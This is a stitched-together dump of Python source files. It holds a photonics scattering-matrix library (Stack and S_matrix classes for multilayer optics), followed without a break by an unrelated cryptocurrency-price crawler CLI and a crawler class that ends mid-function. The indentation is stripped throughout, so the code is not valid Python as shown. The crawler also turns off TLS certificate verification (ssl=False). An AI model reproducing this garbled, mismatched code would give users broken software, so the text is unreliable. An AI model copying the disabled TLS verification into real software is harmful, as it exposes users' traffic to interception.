for lay in self.layers:
if not lay in self.lay_list:
self.lay_list.append(lay)
self.int_list = []
self.interfaces = []
for i in range(self.N - 1):
T_inter = (self.layers[i], self.layers[i + 1])
if not T_inter in self.int_list:
self.int_list.append(T_inter)
self.interfaces.append(T_inter)
def solve(self, k0: float, kx: float = 0.0, ky: float = 0.0) -> None:
"""Calculates the scattering matrix of the multilayer (cpu friendly version)
This version of solve solve the system in the "smart" way, solving fisrt the eigenvalue problem in each unique layer and the interface matrices of all the interface involved. The computaitonal time scales with the number of different layers, not with the total one.
It prioritize minimize the calculation done while using more memory.
Args:
k0 (float): Vacuum wavevector for the simulation (freqency).
kx (float, optional): Wavevector in the x direction for the pseudo-fourier expansion. Defaults to 0.0.
            ky (float, optional): Wavevector in the y direction for the pseudo-Fourier expansion. Defaults to 0.0.
Returns:
None.
"""
for lay in self.lay_list:
lay.mode(k0, kx=kx, ky=ky)
# lay.get_P_norm()
self.layers[0].get_P_norm()
self.layers[-1].get_P_norm()
self.int_matrices = []
for i in self.int_list:
self.int_matrices.append(i[0].interface(i[1]))
self.S = copy.deepcopy(self.int_matrices[0])
for i in range(1, self.N - 1):
self.S.add_uniform(self.layers[i], self.d[i])
self.S.add(self.int_matrices[self.int_list.index(self.interfaces[i])])
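    # Example (sketch, assumed geometry): solving a three-layer stack at a
    # single frequency and reading fundamental-mode transmission/reflection.
    #
    #   st = Stack([lay1, lay2, lay1], [0.0, 0.5, 0.0])
    #   st.solve(1.0 / 1.55)
    #   T = st.get_T(0, 0)
    #   R = st.get_R(0, 0)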
def solve_serial(self, k0: float, kx: float = 0.0, ky: float = 0.0) -> None:
"""Calculates the scattering matrix of the multilayer (memory friendly version)
This version solves sequentially the layers and the interface as they are in the stack. It is more momery efficient since onlt the data of 2 layer are kept in memory at any given time. Computational time scales with the total number of layer, regardless if they are equal or not.
It prioritize memory efficiency while possibly requiring more calculations.
Args:
k0 (float): Vacuum wavevector for the simulation (freqency).
kx (float, optional): Wavevector in the x direction for the pseudo-fourier expansion. Defaults to 0.0.
            ky (float, optional): Wavevector in the y direction for the pseudo-Fourier expansion. Defaults to 0.0.
Returns:
None.
"""
lay1 = self.layers[0]
lay1.mode(k0, kx=kx, ky=ky)
lay1.get_P_norm()
self.S = S_matrix(2 * self.NPW)
for i in range(1, self.N):
lay2 = self.layers[i]
lay2.mode(k0, kx=kx, ky=ky)
self.S.add(lay1.interface(lay2))
self.S.add_uniform(lay2, self.d[i])
if lay1 is not lay2 and i != 1 and i != self.N:
lay1.clear()
lay1 = lay2
lay2.mode(k0, kx=kx, ky=ky)
lay2.get_P_norm()
def solve_lay(self, k0: float, kx: float = 0.0, ky: float = 0.0) -> None:
"""Solve the eigenvalue problem of all the layer in the stack
Args:
k0 (float): Vacuum wavevector for the simulation (freqency).
kx (float, optional): Wavevector in the x direction for the pseudo-fourier expansion. Defaults to 0.0.
            ky (float, optional): Wavevector in the y direction for the pseudo-Fourier expansion. Defaults to 0.0.
Returns:
None.
"""
for lay in self.lay_list:
lay.mode(k0, kx=kx, ky=ky)
# lay.get_P_norm()
self.layers[0].get_P_norm()
self.layers[-1].get_P_norm()
def solve_S(self) -> None:
"""Builds the scattering matrix of the stacks. It assumes that all the layers are alredy solved.
Returns:
None.
"""
self.int_matrices = []
for i in self.int_list:
self.int_matrices.append(i[0].interface(i[1]))
self.S = copy.deepcopy(self.int_matrices[0])
for i in range(1, self.N - 1):
self.S.add_uniform(self.layers[i], self.d[i])
self.S.add(self.int_matrices[self.int_list.index(self.interfaces[i])])
def get_prop(
self, u: np.ndarray, list_lay: list[int], d: np.ndarray = None
) -> dict[int, float]:
"""Calculates the total poyinting vector in the requiested layers
Args:
u (ndarray): array containing the modal coefficient incoming in the first layer.
list_lay (list of int): indexes of the layer of which to calculate the Poynting vector.
d (ndarray, optional): array containing the modal coefficient incoming in the last layer. Defaults to None.
Returns:
            dic (dict): Dictionary of the Poynting vectors in the layers {layer_index : Poynting vector}
"""
dic = {}
u1, d2 = np.zeros((2 * self.NPW), complex), np.zeros((2 * self.NPW), complex)
u1 = u
        if d is not None:
d2 = d
(u2, d1) = self.S.output(u1, d2)
lay = self.layers[0]
d = self.d[0]
if 0 in list_lay:
P = lay.get_Poynting(u1, d1)
dic[0] = P
# intermediate layers
S1 = copy.deepcopy(self.int_matrices[self.int_list.index(self.interfaces[0])])
for i in range(1, self.N - 1):
S2 = S_matrix(S1.N)
for l in range(i, self.N - 1):
S2.add_uniform(self.layers[l], self.d[l])
S2.add(self.int_matrices[self.int_list.index(self.interfaces[l])])
if i in list_lay:
(ul, dl) = S1.int_f_tot(S2, u1, d2)
P = self.layers[i].get_Poynting(ul, dl)
dic[i] = P
S1.add_uniform(self.layers[i], self.d[i])
S1.add(self.int_matrices[self.int_list.index(self.interfaces[i])])
lay = self.layers[-1]
d = self.d[-1]
if self.N - 1 in list_lay:
P = lay.get_Poynting(u2, d2)
dic[self.N - 1] = P
return dic
def get_energybalance(self, u: np.ndarray, d: np.ndarray = None) -> tuple[float]:
"""Get total energy balance of the stack given the inputs
        Return total power reflected, transmitted and absorbed, normalized to the incident power.
Args:
u (1darray): Modal coefficient of the left input.
d (1darray, optional): Modal coefficent of the right input. Defaults to None.
Returns:
            tuple: tuple containing three floats with meaning:
- Total power out from left side (reflection if only u).
- Total power out from right side (transmission if only u).
- Total power absorbed in the stack.
"""
u1, d2, e = (
np.zeros((2 * self.NPW), complex),
np.zeros((2 * self.NPW), complex),
np.zeros((2 * self.NPW), complex),
)
u1 = u
PN = self.layers[0].get_Poynting(u1, e)
if d is not None:
d2 = d
PN -= self.layers[-1].get_Poynting(e, d2)
(u2, d1) = self.S.output(u1, d2)
P1 = self.layers[0].get_Poynting(u1, d1)
P2 = self.layers[-1].get_Poynting(u2, d2)
return P1 / PN, P2 / PN, (P1 - P2) / PN
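    # Example (sketch): checking energy conservation of a solved lossless
    # stack; the third returned value is the absorbed fraction and should
    # vanish to numerical precision when all eps are real.
    #
    #   u = st.layers[0].create_input({0: 1.0})
    #   p_left, p_right, p_abs = st.get_energybalance(u)
    #   assert abs(p_abs) < 1e-8   # tolerance is an assumed value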
def get_inout(
self, u: np.ndarray, d: np.ndarray = None
) -> dict[str, tuple[np.ndarray, np.ndarray, float]]:
"""Return data about the output of the structure given the input
Args:
            u (1darray): Vector of the modal coefficients of the left input.
            d (1darray, optional): Vector of the modal coefficients of the right input. Defaults to None.
Returns:
dict: Dictionary containing data of the output:
                - 'left' : (u,d,P): forward modal coefficient, backward modal coefficient and Poynting vector at the left side.
                - 'right' : (u,d,P): forward modal coefficient, backward modal coefficient and Poynting vector at the right side.
"""
u1, d2 = np.zeros((2 * self.NPW), complex), np.zeros((2 * self.NPW), complex)
u1 = u
        if d is not None:
d2 = d
(u2, d1) = self.S.output(u1, d2)
dic = {}
P = self.layers[0].get_Poynting(u1, d1)
dic["left"] = (u1, d1, P)
P = self.layers[-1].get_Poynting(u2, d2)
dic["right"] = (u2, d2, P)
return dic
def get_R(self, i: int, j: int, ordered: bool = True) -> float:
"""Get relfection coefficient between modes
Args:
i (int): Index of the source mode.
j (int): Index of the target mode.
            ordered (bool, optional): If True, modes are ordered by decreasing effective index; otherwise the order is whatever is returned by the diagonalization routine. Defaults to True.
Returns:
float: Reflection between the modes
"""
if ordered:
j1 = np.argsort(self.layers[0].W)[-i - 1]
j2 = np.argsort(self.layers[0].W)[-j - 1]
else:
j1 = i
j2 = j
return (
np.abs(self.S.S21[j1, j2]) ** 2
* self.layers[0].P_norm[j2]
/ self.layers[0].P_norm[j1]
)
def get_T(self, i: int, j: int, ordered: bool = True) -> float:
"""Get transmission coefficient between modes.
Args:
i (int): Index of the source mode.
j (int): Index of the target mode.
            ordered (bool, optional): If True, modes are ordered by decreasing effective index; otherwise the order is whatever is returned by the diagonalization routine. Defaults to True.
Returns:
float: Transmission between the modes.
"""
if ordered:
j1 = np.argsort(self.layers[0].W)[-i - 1]
j2 = np.argsort(self.layers[-1].W)[-j - 1]
else:
j1 = i
j2 = j
return (
np.abs(self.S.S11[j2, j1]) ** 2
* self.layers[-1].P_norm[j2]
/ self.layers[0].P_norm[j1]
)
def get_PR(self, i: int, j: int, ordered: bool = True) -> float:
"""Get phase of the relfection coefficient between modes
Args:
i (int): Index of the source mode.
j (int): Index of the target mode.
            ordered (bool, optional): If True, modes are ordered by decreasing effective index; otherwise the order is whatever is returned by the diagonalization routine. Defaults to True.
Returns:
float: Phase of reflection between the modes
"""
if ordered:
j1 = np.argsort(self.layers[0].W)[-i - 1]
j2 = np.argsort(self.layers[0].W)[-j - 1]
else:
j1 = i
j2 = j
return np.angle(self.S.S21[j2, j1])
def get_PT(self, i: int, j: int, ordered: bool = True) -> float:
"""Get phase of the transmission coefficient between modes
Args:
i (int): Index of the source mode.
j (int): Index of the target mode.
            ordered (bool, optional): If True, modes are ordered by decreasing effective index; otherwise the order is whatever is returned by the diagonalization routine. Defaults to True.
Returns:
float: Phase of transmission between the modes
"""
if ordered:
j1 = np.argsort(self.layers[0].W)[-i - 1]
j2 = np.argsort(self.layers[-1].W)[-j - 1]
else:
j1 = i
j2 = j
return np.angle(self.S.S11[j2, j1])
def get_el(self, sel: str, i: int, j: int) -> complex:
"""Returns element of the scattering matrix
        Note: Modes are ordered by decreasing effective index
Args:
            sel (str): Select the relevant submatrix. Choices are '11', '12', '21', '22'.
            i (int): First index of the matrix.
            j (int): Second index of the matrix.
Raises:
ValueError: If sel in not in the allowed.
Returns:
complex: Element of the scattering matrix.
"""
io = np.argsort(self.layers[0].W)[-i]
jo = np.argsort(self.layers[-1].W)[-j]
if sel == "11":
return self.S.S11[io, jo]
elif sel == "12":
return self.S.S12[io, jo]
elif sel == "21":
return self.S.S21[io, jo]
elif sel == "22":
return self.S.S22[io, jo]
else:
raise ValueError(f"Sel {sel} not allowed. Only '11', '12', '21', '22'")
def double(self) -> None:
"""Compose the scattering matrix of the stack with itself, doubling the structure
When doing this, the lenght of the first al last layer are ignored (set to 0).
To function properly hoever they need to be equal (but do not need to have physical meaning)
Raises:
RuntimeError: Raised if the stack is not solved yet.
Returns:
None.
"""
try:
self.S.add(self.S)
except AttributeError:
raise RuntimeError("structure not solved yet")
def join(self, st2: Stack) -> None:
"""Join the scattering matrix of the structure with the one of a second structure
When doing this, the lenght of the first al last layeror each stack are ignored (set to 0).
To function last layer of self and first of st2 need to be equal (but do not need to have physical meaning).
The condiction used to previoselt solve the stack needs to be the same. This is not checked by the code, so be careful.
Args:
st2 (Stack): Stack to which to join self.
Raises:
RuntimeError: Raised is one the structure is not solved yet.
Returns:
None.
"""
try:
self.S
except AttributeError:
raise RuntimeError("structure 1 not solved yet")
try:
st2.S
except AttributeError:
raise RuntimeError("structure 2 not solved yet")
self.S.add(st2.S)
l1 = self.layers[:-1]
l2 = st2.layers[1:]
self.layers = l1 + l2
def flip(self) -> None:
"""Flip a solved stack
Flip the stack, swapping the left and right side
Raises:
RuntimeError: Raised if the structure is not solved yet.
Returns:
None.
"""
try:
S = copy.deepcopy(self.S)
self.S.S11 = S.S22
self.S.S22 = S.S11
self.S.S12 = S.S21
self.S.S21 = S.S12
except AttributeError:
raise RuntimeError("structure not solved yet")
self.layers = self.layers[::-1]
self.d = self.d[::-1]
def bloch_modes(self) -> np.ndarray:
"""Calculates Bloch modes of the stack.
This function assumens the stack to represent the unit cell of a periodic structure, and calculates the corresponding Bloch modes.
The thickness of the first and last layer are ignored (assumed 0). To work correctly first and last layer needs to be the same.
Returns:
TYPE: DESCRIPTION.
"""
[self.BW, self.BV] = self.S.S_modes()
self.Bk = -(0.0 + 1j) * np.log(self.BW) / (2.0 * np.pi * self.tot_thick)
# reorder modes
ind = np.argsort((0.0 + 1.0j) * self.Bk)
self.BW = self.BW[ind]
self.Bk = self.Bk[ind]
self.BV[:, :] = self.BV[:, ind]
return self.Bk
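    # Example (sketch): Bloch wavevectors of a periodic two-layer unit cell;
    # first and last layer are the same, as bloch_modes requires.
    #
    #   cell = Stack([lay1, lay2, lay1], [0.0, 0.3, 0.0])
    #   cell.solve(1.0 / 1.55)
    #   Bk = cell.bloch_modes()   # complex, in units of 1/tot_thick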
def loop_intermediate(self, u1: np.ndarray, d2: np.ndarray) -> tuple:
"""Generator for the intermedia modal coefficients.
Progressively yields the forward and backward modal coefficient given the external excitation.
Args:
u1 (np.ndarray): forward modal coefficient of the first layer (near the interface)
d2 ((np.ndarray): backward modal coefficient of the last layer (near the interface)
Yields:
np.ndarray: forward modal amplitudes of layer
np.ndarray: backward modal amplitudes for layer
Layer: layer object
float: thickness of the layer
"""
u2, d1 = self.S.output(u1, d2)
lay = self.layers[0]
d = self.d[0]
yield u1 * np.exp(-(0 + 2j) * np.pi * lay.k0 * lay.gamma * d), d1 * np.exp(
(0 + 2j) * np.pi * lay.k0 * lay.gamma * d
), self.layers[0], self.d[0]
# yield u1 , d1 , self.layers[0], self.d[0]
S1 = copy.deepcopy(self.int_matrices[self.int_list.index(self.interfaces[0])])
for i in range(1, self.N - 1):
S2 = S_matrix(S1.N)
for l in range(i, self.N - 1):
S2.add_uniform(self.layers[l], self.d[l])
S2.add(self.int_matrices[self.int_list.index(self.interfaces[l])])
ul, dl = S1.int_f(S2, u1)
yield ul, dl, self.layers[i], self.d[i]
S1.add_uniform(self.layers[i], self.d[i])
S1.add(self.int_matrices[self.int_list.index(self.interfaces[i])])
yield u2, d2, self.layers[self.N - 1], self.d[self.N - 1] + 1e-6
def calculate_epsilon(
self,
x: np.ndarray = 0.0,
y: np.ndarray = 0.0,
z: np.ndarray = 0.0,
) -> dict[str, np.ndarray]:
"""Returns epsilon in the stack
        Epsilon is calculated on a meshgrid of x, y, z
Args:
x (np.ndarray): x coordinate (1D array)
y (np.ndarray): y coordinate (1D array)
z (np.ndarray): z coordinate (1D array)
        Returns:
dict: Dictionary containing the coordinates and the epsilon
"""
x, y, z = np.asarray(x), np.asarray(y), np.asarray(z)
eps = {key: [] for key in ["x", "y", "z", "eps"]}
cumulative_t = 0
for lay, t in zip(self.layers + [self.layers[-1]], self.d + [np.inf]):
ind = np.logical_and(cumulative_t <= z, z < cumulative_t + t)
            if not np.any(ind):
continue
zp = z[ind] - cumulative_t
out = lay.calculate_epsilon(x, y, zp)
out["z"] = out["z"] + cumulative_t
for key in eps:
eps[key].append(out[key])
cumulative_t += t
for key in eps:
eps[key] = np.concatenate(eps[key], axis=-1)
return eps
def calculate_fields(
self,
u1: np.ndarray,
d2: np.ndarray = None,
x: np.ndarray = 0,
y: np.ndarray = 0,
z: np.ndarray = 0,
components: list[str] = None,
) -> dict[str, np.ndarray]:
"""Returns fields in the stack
        The fields are calculated on a meshgrid of x, y, z
Args:
u1 (np.ndarray): forward modal coefficient in the first layer
d2 (np.ndarray): backward modal coefficient in the last layer
x (np.ndarray): x coordinate (1D array)
y (np.ndarray): y coordinate (1D array)
z (np.ndarray): z coordinate (1D array)
            components (list): List of field components to be calculated. Possible values are ['Ex', 'Ey', 'Hx', 'Hy'].
                Defaults to None (all of them).
        Returns:
dict: Dictionary containing the coordinates and the field components
"""
        d2 = np.zeros(2 * self.NPW, dtype=complex) if d2 is None else np.asarray(d2)
x, y, z = np.asarray(x), np.asarray(y), np.asarray(z)
components = Layer._filter_componets(components)
        Layer._check_array_shapes(u1, d2)
keys = ["x", "y", "z"] + components
field = {key: [] for key in keys}
cumulative_t = 0
for u, d, lay, t in self.loop_intermediate(u1, d2):
# print(u, d)
ind = np.logical_and(cumulative_t <= z, z < cumulative_t + t)
            if not np.any(ind):
continue
zp = z[ind] - cumulative_t
out = lay.calculate_field(u, d, x, y, zp, components=components)
out["z"] = out["z"] + cumulative_t
for key in keys:
field[key].append(out[key])
# plt.plot(np.abs(out['Ex']))
# plt.show()
# plt.plot(np.abs(field['Ex']))
cumulative_t += t
for key in keys:
field[key] = np.concatenate(field[key], axis=-1)
return field
def inspect(self, st: str = "", details: str = "no") -> None:
"""Print some info about the Stack"""
att = sub.get_user_attributes(self)
print(st)
print(22 * "_")
print("| INT argument")
for i in att:
if type(i[1]) is int:
print("|%10s%10s" % (i[0], str(i[1])))
print("| Float argument")
for i in att:
if type(i[1]) is float:
print("|%10s%10s" % (i[0], str(i[1])))
for i in att:
if type(i[1]) is np.float64:
print("|%10s%10s" % (i[0], str(i[1])))
print("| BOOL argument")
for i in att:
if type(i[1]) is bool:
print("|%10s%10s" % (i[0], str(i[1])))
print("| Array argument")
for i in att:
if type(i[1]) is np.ndarray:
print("|%10s%10s" % (i[0], str(np.shape(i[1]))))
print("| List argument")
for i in att:
if type(i[1]) is list:
print("|%12s%8s" % (i[0], str(len(i[1]))))
print("")
try:
print("lay list:")
for s in self.lay_list:
print(s)
print("layers:")
for s in self.layers:
print(s)
print("int_list:")
for s in self.int_list:
print(s)
print("interfaces:")
for s in self.interfaces:
print(s)
except AttributeError:
print("No list yet, call conut_interface before inspect")
if __name__ == "__main__":
from monitor import Timer
import pickle
timer = Timer()
N = 50
cr = A_FMM.Creator()
cr.slab(12.0, 2.0, 2.0, 0.3)
lay1 = A_FMM.layer.Layer(N, 0, creator=cr)
cr.slab(12.0, 2.0, 2.0, 0.1)
lay2 = A_FMM.layer.Layer(N, 0, creator=cr)
stack = Stack(
10 * [lay1, lay2] + [lay1],
[0.0] + 10 * [0.5, 0.5],
)
x, y, z = np.linspace(-0.5, 0.5, 101), 0.0, np.linspace(0.0, 10.0, 1000)
eps = stack.calculate_epsilon(x, y, z)
print(eps.keys())
plt.contourf(
np.squeeze(eps["z"]), np.squeeze(eps["x"]), np.squeeze(eps["eps"]), levels=41
)
plt.show()
# lay1 = A_FMM.layer.Layer_uniform(0,0,2.0)
# lay2 = A_FMM.layer.Layer_uniform(0,0,12.0)
# stack = Stack(
# 10 * [lay1, lay2] + [lay1],
# [0.0] + 10*[0.5, 0.5],
# )
# stack.solve(0.1)
# x, y, z = 0.0, 0.0, np.linspace(0.0, 10.0, 1000)
# with timer:
# field = stack.calculate_fields([1.0, 0.0], [0.0, 0.0], x,y,z)
# print(timer.elapsed_time)
# with open('test_stack_1Dfield.pkl', 'wb') as pkl:
# pickle.dump(field, pkl, protocol=pickle.HIGHEST_PROTOCOL)
# layer = lay1.calculate_field([1.0, 0.0], [0.0, 0.0], x,y,z)
# #plt.contourf(np.squeeze(field['z']), np.squeeze(field['x']), np.abs(np.squeeze(field['Ex'])), levels=41)
# plt.show()
# with timer:
# Ex, Ey = stack.plot_E(1, func=np.abs, dz = 0.01)
# print(timer.elapsed_time)
# Ex = np.asarray(Ex)
# plt.show()
# plt.plot(field['z'][0,0,:], np.abs(field['Ex'][0,0,:]))
# plt.plot(z, np.abs(Ex[:, 50]))
# print(np.shape(field['z']))
    # plt.show()

# ---- end of file: A_FMM/stack.py ----
import numpy as np
import scipy.linalg as linalg
class S_matrix:
"""Implementation of the scattring matrix object
This object is a container for NxN matrices, conventionally defined as S11, S12, S21 and S22
Also, it implementens all the methods involving operations on scattring matrix
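
    Example (illustrative sketch):
        s1, s2 = S_matrix(2), S_matrix(2)
        s1.add(s2)   # s1 now represents the two sections joined in series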
"""
def __init__(self,N):
"""Creator
Args:
            N (int): Dimension of each of the NxN submatrices of the scattering matrix. The total matrix is 2Nx2N
Returns:
None.
"""
self.N=N
self.S11=np.identity(N,complex)
self.S22=np.identity(N,complex)
self.S12=np.zeros((N,N),complex)
self.S21=np.zeros((N,N),complex)
#OLD RECURSION VERSION
#def add(self,s):
# T1=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(self.S12,s.S21)),self.S11)
# T2=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(s.S21,self.S12)),s.S22)
# self.S11=np.dot(s.S11,T1)
# self.S12=s.S12+np.dot(np.dot(s.S11,self.S12),T2)
# self.S21=self.S21+np.dot(np.dot(self.S22,s.S21),T1)
# self.S22=np.dot(self.S22,T2)
#NEW RECURSION VERSION
def add(self,s):
"""Recursion method for joining two scattering matrices
The connection is between the "right" side of self and the "left" side of s
Args:
            s (S_matrix): scattering matrix to be joined to self.
Returns:
None.
"""
I=np.identity(self.N,complex)
T1=np.dot(s.S11,linalg.inv(I-np.dot(self.S12,s.S21)))
T2=np.dot(self.S22,linalg.inv(I-np.dot(s.S21,self.S12)))
self.S21=self.S21+np.dot(np.dot(T2,s.S21),self.S11)
self.S11=np.dot(T1,self.S11)
self.S12=s.S12 +np.dot(np.dot(T1,self.S12),s.S22)
self.S22=np.dot(T2,s.S22)
def add_left(self,s):
"""Recursion method for joining two scattering matrices
The connection is between the "left" side of self and the "right" side of s
Args:
            s (S_matrix): scattering matrix to be joined to self.
Returns:
None.
"""
T1=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(s.S12,self.S21)),s.S11)
T2=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(self.S12,s.S21)),self.S22)
s.S11=np.dot(self.S11,T1)
s.S12=self.S12+np.dot(np.dot(self.S11,s.S12),T2)
s.S21=s.S21+np.dot(np.dot(s.S22,self.S21),T1)
s.S22=np.dot(s.S22,T2)
def add_uniform(self,lay,d):
"""Recursion method for addig to self the progation matrix of a given layer
The connection is between the "right" side of self and the "left" side of the propagation matrix
Args:
lay (Layer): Layer of which to calculate the propagation matrix
d (float): Thickness of the layer
Returns:
None.
"""
E=np.diag(np.exp((0+2j)*np.pi*lay.k0*lay.gamma*d))
self.S11=np.dot(E,self.S11)
self.S12=np.dot(E,np.dot(self.S12,E))
self.S22=np.dot(self.S22,E)
def add_uniform_left(self,lay,d):
"""Recursion method for addig to self the progation matrix of a given layer
The connection is between the "left" side of self and the "right" side of the propagation matrix
Args:
lay (Layer): Layer of which to calculate the propagation matrix
d (float): Thickness of the layer
Returns:
None.
"""
E=np.diag(np.exp((0+2j)*np.pi*lay.k0*lay.gamma*d))
self.S11=np.dot(self.S11,E)
self.S21=np.dot(E,np.dot(self.S21,E))
self.S22=np.dot(E,self.S22)
def S_print(self,i=None,j=None):
"""Function for printing the scattering matrix.
It can print both the full matrix or the 2x2 matrix between relevant modes
Args:
i (int, optional): index of the "left" mode. Default is None (full matrix)
j (int, optional): index of the "right" mode. Default is None (full matrix)
Returns:
None.
"""
        if i is None:
S=np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])])
else:
            j = i if j is None else j
S=np.vstack([np.hstack([self.S11[i,j],self.S12[i,j]]),np.hstack([self.S21[i,j],self.S22[i,j]])])
print(S)
def det(self):
"""Calculate the determinat of the scattering matrix
Returns:
float: Determinant of the scattering matrix
"""
return linalg.det(np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])]))
def S_modes(self):
"""Solves the eigenvalue problem of the Bloch modes of the scattring matrix
Returns:
W (1darray): arrays of the eigenvalues (complex amplitude of the mode after one period)
V (2darray): arrays of the eigenvectors (Bloch modes on the base of the guided mode in the first and last layer)
"""
ID=np.identity(self.N)
Z=np.zeros((self.N,self.N))
S1=np.vstack([np.hstack([self.S11,Z]),np.hstack([self.S21,-ID])])
S2=np.vstack([np.hstack([ID,-self.S12]),np.hstack([Z,-self.S22])])
[W,V]=linalg.eig(S1,b=S2)
return W,V
def det_modes(self,kz,d):
ID=np.identity(self.N)
Z=np.zeros((self.N,self.N))
S1=np.vstack([np.hstack([self.S11,Z]),np.hstack([self.S21,-ID])])
S2=np.vstack([np.hstack([ID,-self.S12]),np.hstack([Z,-self.S22])])
return linalg.det(S1-np.exp((0.0+1.0j)*kz*d)*S2)
def der(self,Sm,Sp,h=0.01):
"""Calculates the first and second derivative of the scattering matrix with respec to the parameter par.
Args:
Sm (S_matrix): S matrix calculated at par=par0-h
Sp (S_matrix): S matrix calculated at par=par0+h
h (float, optional): Interval used to calculate the derivatives . Defaults to 0.01.
Returns:
tuple: tuple containing:
- S1 (2darray): First derivative of the scattering matrix with respect to par.
- S2 (2darray): Second derivative of the scattering matrix with respect to par.
"""
S=np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])])
S_m=np.vstack([np.hstack([Sm.S11,Sm.S12]),np.hstack([Sm.S21,Sm.S22])])
S_p=np.vstack([np.hstack([Sp.S11,Sp.S12]),np.hstack([Sp.S21,Sp.S22])])
S1=(S_p-S_m)/(2.0*h)
S2=(S_p+S_m-2.0*S)/(h*h)
return (S1,S2)
def matrix(self):
"""Returns the full scattering matrix
Returns:
2darray: Scattering matrix as numpy array
"""
return np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])])
def output(self,u1,d2):
"""Returs the output vectors given the input vectors
Args:
u1 (1darray): Array of modal coefficient of "left" inputs.
d2 (1darray): Array of modal coefficient of "right" inputs.
Returns:
tuple: tuple containing:
- u2 (1darray): Array of modal coefficient of "right" outputs.
- d1 (1darray): Array of modal coefficient of "left" outputs.
"""
u2=np.add(np.dot(self.S11,u1),np.dot(self.S12,d2))
d1=np.add(np.dot(self.S21,u1),np.dot(self.S22,d2))
return (u2,d1)
def left(self,u1,d1):
"""Return the "right" inout and output vectors given the "left" ones
Args:
u1 (1darray): Array of modal coefficient of "left" inputs.
d1 (1darray): Array of modal coefficient of "left" outputs.
Returns:
tuple: tuple containing:
- u2 (1darray): Array of modal coefficient of "right" outputs.
- d2 (1darray): Array of modal coefficient of "right" inputs.
"""
d2=linalg.solve(self.S22,d1-np.dot(self.S21,u1))
        u2 = np.add(np.dot(self.S11, u1), np.dot(self.S12, d2))  # u2 = S11 u1 + S12 d2, consistent with output()
return (u2,d2)
def int_f(self,S2,u):
"""Retirn the modal coefficient between two scattering matrces (self and S2)
Args:
S2 (S_matrix): Scattering matrix to between self and the end of the structure
u (1darray): Array of modal coefficient of "left" inputs to self.
Returns:
tuple: tuple containing:
- uo (TYPE): Array of coefficients of left-propagating modes in the middle
- do (TYPE): Array of coefficients of right-propagating modes in the middle
"""
ID=np.identity(self.N)
ut=np.dot(self.S11,u)
uo=linalg.solve(ID-np.dot(self.S12,S2.S21),ut)
do=linalg.solve(ID-np.dot(S2.S21,self.S12),np.dot(S2.S21,ut))
return (uo,do)
def int_f_tot(self,S2,u,d):
"""Retirn the modal coefficient between two scattering matrces (self and S2)
Args:
S2 (S_matrix): Scattering matrix to between self and the end of the structure
u (1darray): Array of modal coefficient of "left" inputs to self.
d (1darray): Array of modal coefficient of "right" inputs to S2
Returns:
tuple: tuple containing:
- uo (TYPE): Array of coefficients of left-propagating modes in the middle
- do (TYPE): Array of coefficients of right-propagating modes in the middle
"""
ID=np.identity(self.N)
ut=np.dot(self.S11,u)
dt=np.dot(S2.S22,d)
uo=linalg.solve(ID-np.dot(self.S12,S2.S21),np.add(ut,np.dot(self.S12,dt)))
do=linalg.solve(ID-np.dot(S2.S21,self.S12),np.add(np.dot(S2.S21,ut),dt))
return (uo,do)
    int_complete = int_f_tot
import argparse
import sys
from datetime import datetime
from crawl_currency import *
from update_local_id_map import *
def process_date(date):
t = datetime.strptime(date, "%Y-%m-%d")
return int(t.timestamp())
def check():
    if sys.version_info < (3, 7):
print("Minimum python interpreter version required: 3.7! Sorry!")
sys.exit(1)
def main():
check()
crawler = SimpleCrawler()
string_desc = "A simple crawler for historical data of cryptocurrencies. Be careful to input date with " \
"format Y-M-D. "
parser = argparse.ArgumentParser(description=string_desc)
group = parser.add_mutually_exclusive_group()
parser.add_argument("start", help="The start date(format Y-M-D) of the data")
parser.add_argument("end", help="The end date(format Y-M-D) of the data")
parser.add_argument("-a", '--api',
help="Private API key used for updating the local IDs map")
parser.add_argument("-l", '--limit', help="The number of currencies to crawl (1-5000). If not specified, use 50 "
"as default", default=50, type=int)
group.add_argument("-n", '--name',
help="Used to crawl single currency' data. Notice that by setting this parameter, limit will be "
"ignored.")
group.add_argument("-i", '--index', help="The start index of the data we want to process.", default=0, type=int)
group.add_argument("-f", '--file',
help="Crawl currencies with names specified in a file. Only one name is allowed per line")
    parser.add_argument('-v', '--version', action='version',
version='simple_crawler version : v 1.01', help='Show the version')
args = parser.parse_args()
start = args.start
end = args.end
api_key = args.api
name = args.name
limit = args.limit
file = args.file
index = args.index
start_date = process_date(start)
end_date = process_date(end)
if file is not None:
crawler.crawl_list_currency(file, start_date, end_date)
sys.exit(0)
if name is not None:
if crawler.crawl_single_currency(name, start_date, end_date) == -1:
print(f"Sorry, can't find coin {name}")
sys.exit(1)
else:
print(f"Crawl {name} finished!")
sys.exit(0)
if api_key is not None:
if update_local_id_map(api_key) == -1:
print("Wrong API key! Check your API key and try again!")
sys.exit(1)
else:
print("Successfully update local ID map")
while limit > 400:
        crawler.run_multi_query(index + limit - 400, 400, start_date, end_date)
limit -= 400
time.sleep(30)
print("Waiting for next execution!")
    crawler.run_multi_query(index, limit, start_date, end_date)
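# Illustrative invocations (dates and names are examples only):
#   python client.py 2021-01-01 2021-02-01 --limit 100
#   python client.py 2021-01-01 2021-02-01 --name Bitcoin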
if __name__ == '__main__':
    main()
import asyncio
import time
from collections import OrderedDict
import aiohttp
import pandas as pd
class SimpleCrawler:
local_map = OrderedDict()
def __init__(self):
self.read_id_map_from("map_data.txt")
@staticmethod
def process_strings(s: str):
s = s.replace("\n", "")
s = s.replace("/", "")
        s = s.strip()  # strip() returns a new string, so the result must be reassigned
return s
async def get_page(self, cid, currency_name, time_start, time_end):
"""
Get a specified page's data
:param cid: currency id
:param currency_name: currency_name
:param time_start: the start time (seconds from unix epoch)
:param time_end: the end time (seconds from unix epoch)
:return: None
"""
with aiohttp.TCPConnector(ssl=False) as conn:
currency_name = currency_name.replace("\n", "")
url = f"https://api.coinmarketcap.com/data-api/v3/cryptocurrency/historical?id={cid}&convertId=2787&timeStart={time_start}" \
f"&timeEnd={time_end}"
print(url)
